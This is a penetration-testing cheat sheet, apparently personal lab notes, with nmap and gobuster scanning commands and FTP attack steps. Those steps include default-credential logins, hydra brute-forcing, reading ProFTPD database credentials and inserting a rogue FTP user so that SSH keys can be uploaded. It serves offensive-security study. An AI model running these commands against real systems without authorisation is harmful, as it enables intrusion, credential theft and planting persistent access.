# Top commands 🥇

## Nmap

```bash
sudo nmap -sSCV --min-rate 5000 -Pn -n -p- --open -vvv -oA all_ports <target>
```

## Gobuster

```bash
# Directories
gobuster dir -e -t 100 -b 400-600 --exclude-length 0 --no-error -a "Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0" -w /usr/share/wordlists/own/final_directories.txt -u <target>

# Filenames
gobuster dir -e -t 100 -b 400-600 --exclude-length 0 --no-error -a "Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0" -w /usr/share/own/dirb/common_4459.txt -x .asp,.aspx,.config,.do,.git,.html,.jsp,.pdf,.php,.ps1,.sql,.txt,.yml -u <target>

# Virtual hosts
gobuster vhost -t 100 -w /usr/share/own/subdomain/knocpy_1921.txt --append-domain -u <target> # Do not include http:// in the URL
```

# Pentesting Services 🪲

## 21 FTP

```bash
# Default ports are 20 (data) and 21 (control).
# Always try the `admin:admin` and `user:system` credentials.
# If FTP is not working or is slow, run `passive off` after a successful login.
# Use `binary` mode if you upload shell.exe.

# Check the anonymous user
ftp -n <target> <<END
user anonymous anonymous
<command>
quit
END
# ls
# put <local_file> <remote_file>

# Download
get <file>

# Upload
mput <local_file> <remote_file>

# Use secure FTP (note: `-z verify=0` disables server certificate verification)
ftp-ssl -z secure -z verify=0 -z cipher="$(openssl ciphers -tls1)" -p <target>

# ProFTP credentials
cat /etc/proftpd/sql.conf
# SQLConnectInfo proftpd@localhost proftpd protfpd_with_MYSQL_password

# Add user
mysql -u proftpd -p'protfpd_with_MYSQL_password' -h 127.0.0.1 -P 3306
show databases;
use proftpd;
select * from ftpuser;

# Create proftpd user
/bin/echo "{md5}"`/bin/echo -n '23Qwerty!' | openssl dgst -binary -md5 | openssl enc -base64` # {md5}RPesAkyTyJaqB6afVNB2pA==
INSERT INTO `ftpuser` (`id`, `userid`, `passwd`, `uid`, `gid`, `homedir`, `shell`, `count`, `accessed`, `modified`) VALUES (NULL, 'benoit', '{md5}RPesAkyTyJaqB6afVNB2pA==', '1000', '1000', '/', '/bin/bash', '0', '2022-12-05 05:26:29', '2022-12-12 05:26:29');
# Connect to FTP and upload authorized_keys
# https://medium.com/@nico26deo/how-to-set-up-proftpd-with-a-mysql-backend-on-ubuntu-c6f23a638caf

# Nmap FTP NSE
nmap --script ftp-anon -p 21 <target>
nmap --script ftp-vuln* -p 21 <target>
nmap --script ftp-* -p 21 <target>

# FTP Bruteforce
hydra -I -V -f -u -e nsr -L usernames.txt -P usernames.txt <target> ftp -s 21 # or use ftp://<machine_ip>

# Default credentials
paste -d ":" usernames.txt passwords.txt > ftp_credentials.txt
hydra -I -V -f -u -e s -t 1 -C /usr/share/wordlists/own/services/ftp/ftp_credentials.txt exghost.offsec ftp -s 21
# Try machine_name:machine_name
```